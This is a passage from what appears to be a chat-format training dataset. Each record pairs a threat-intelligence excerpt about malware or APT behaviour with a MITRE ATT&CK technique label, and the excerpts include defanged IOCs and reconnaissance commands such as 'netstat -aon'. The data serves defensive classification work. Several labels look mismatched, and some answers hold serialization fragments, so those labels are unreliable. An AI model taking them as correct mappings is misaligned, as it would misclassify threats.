- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1036.003 - Masquerading: Rename System Utilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL has encrypted the payload with an XOR-based algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA)."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence by creating a shortcut."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore has the capability to edit the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KOCTOPUS has used PowerShell commands to download additional files."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script is used to decode and execute the following payloads:Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.PoohMilk AnalysisThe PoohMilk sample is designed to perform two actions:Create persistence to execute the Freenki sample at the next reboot.Check specific files on the infected machine.The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence by adding a new service with the display name \"WMI Performance Adapter Extension\" in an attempt to masquerade as a legitimate WMI service."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used .iso files to deploy malicious .lnk files."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can use multiple domains and protocols in C2."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On execution, the MSI downloader starts by checking if it is running in a virtual machine. If not, downloads a zip file, unzips it, deletes itself, establishes persistency and restarts the system"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has used encryption and base64 to obfuscate its orchestrator code in the Registry. ComRAT has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX has a module to list the processes running on a machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy has the ability to discover information about the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exploited Microsoft Word vulnerability CVE-2017-0199 for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seaduke delivery The attackers control Cozyduke via compromised websites, issuing instructions to infected machines by uploading “tasks” to a database file. Cozyduke will periodically contact these websites to retrieve task information to be executed on the local machine. One such task (an encoded PowerShell script) instructed Cozyduke to download and execute Seaduke from a compromised website"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can encrypt C2 traffic using XOR with a hard coded key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leverages vulnerable versions of Flash to perform execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Janicab captured screenshots and sent them out to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used , a RAT that uses HTTP to communicate."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has downloaded additional tools, such as TEARDROP malware and Cobalt Strike, to a compromised host following initial access."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial beacon packet for Mis-Type contains the operating system version and file system of the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation', 'T1098.002 - Account Manipulation: Additional Email Delegate Permissions"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used tools capable of stealing contents of the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FruitFly takes screenshots of the user's desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sliver can take screenshots of the victim’s active display."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is initially packed."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Afterwards, the persistence file will be created in /Library/LaunchDaemons/ or ~/Library/LaunchAgents/ folder. This persistence file is also set to hidden with a randomly generated file date and time"
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon', 'T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use \"net localgroup\" to enable discovery of local groups."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty collects screenshots of the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The discovery modules used with Duqu can collect information on network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugin is executed by using the Info command in the Lizar client application. A data structure containing the OS version, user name and computer name is sent to the server"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To compress the data, GetFrame() invokes the Common.Compress() method, which is used to compress the data by leveraging the C# GZipStream compression class"
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used SSH to move laterally through victim environments."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can identify the IP address of the victim system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Executes VBScript using Process.Start. Next, the DLL loads an embedded resource named \"78c855a088924e92a7f60d661c3d1845\" into memory and decrypts it using multiple XOR operations. Loads the resource using Assembly.GetManifestResourceStream. Method that performs the XOR decryption. The decrypted resource is a DLL file embedded with two resources named \"AdvancedRun\" and \"Waqybg\" that are compressed with GZip. Two resources embedded in the decrypted resource. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Calling GZipStream class to decompress the resource. Drops AdvancedRun.exe using File.WriteAllBytes. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "According to Group-IB's Threat Intelligence & Attribution system, the alleged database was published on a fraudulent resource known for reselling data that has been published on various data-leak websites. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. Starting from at least February 23, 2021, a device inside the company's network communicated with a server with the IP address 185[.]118[.]166[.]66. The threat actor collected information inside the local network, including names of network resources and their addresses. Below are examples of commands that were used for lateral movement: . The name of the campaign, ColunmTK, is derived from these initially discovered domains. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. This IP address was used as an A record for two domains: server04[.]dns04[.]com and service04[.]dns04[.]com. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa’s shellcode attempted to find the process ID of the current process."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can use `SetWindowsHookEx` and `GetKeyNameText` to capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has used malicious links to lure users into executing malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When exfiltrating the keychain, the keychain field is used instead of data"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The malicious macro scans the victim’s Outlook inbox and looks for the strings “$$cpte” and “$$ecpte”. 2) Then the macro will open a CMD shell that will execute whatever instruction / command is in between the strings. 4) The macro searches for the special strings in the “Deleted Items” folder to find the attacker’s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can use a second channel for C2 when the primary channel is in upload mode."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has commands to get the time the machine was built, the time, and the time zone."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cybercriminals will often use LNK files attached in an email to launch an attack on unsuspecting victims. And we recently noticed another campaign using this technique"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This can be seen in the following images taken from hxxp:// feeds.rapidfeeds[.]com/88604/, which is one of the dead drop resolvers we encountered in this sample: Figure 7 Dead drop resolver used by BADNEWS In order to decrypt this data, the authors have included additional steps from previous versions"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy uses \"netstat -aon\" to gather network connection information."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has the ability to encrypt system data and add the \".cuba\" extension to encrypted files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download and upload files to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1 XAgent macOS HTTP POST request Figure 2 XAgent mscOS HTTP GET request The C2 URLs generated by XAgentOSX are very similar to those created by its Windows-based counterpart"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy uses HTTP and HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `net share` command as part of their advanced reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to create to upload and/or download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker's custom cryptor, CryptOne, used an XOR based algorithm to decrypt the payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail has the ability to decrypt strings using hard-coded AES keys."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has the ability to pack its payload."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants of use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\""
- },
- {
- "role": "assistant",
- "content": "T1546.010 - Event Triggered Execution: AppInit DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another interesting technique this malware uses is Visual Studio’s Resource Manager. This is a feature built into Visual Studio that allows one to attach basically any file to the original binary and get a pointer to its data with a few simple API calls. Siloscape uses this method to write the Tor archive to the disk, as well as the unzip binary used to open the archive. It also uses Tor to securely connect to its C2"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a batch script that adds a Registry Run key to establish malware persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker variants spread through NetBIOS share propagation."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockerGoga has been observed deleting its original launcher after execution."
- },
- {
- "role": "assistant",
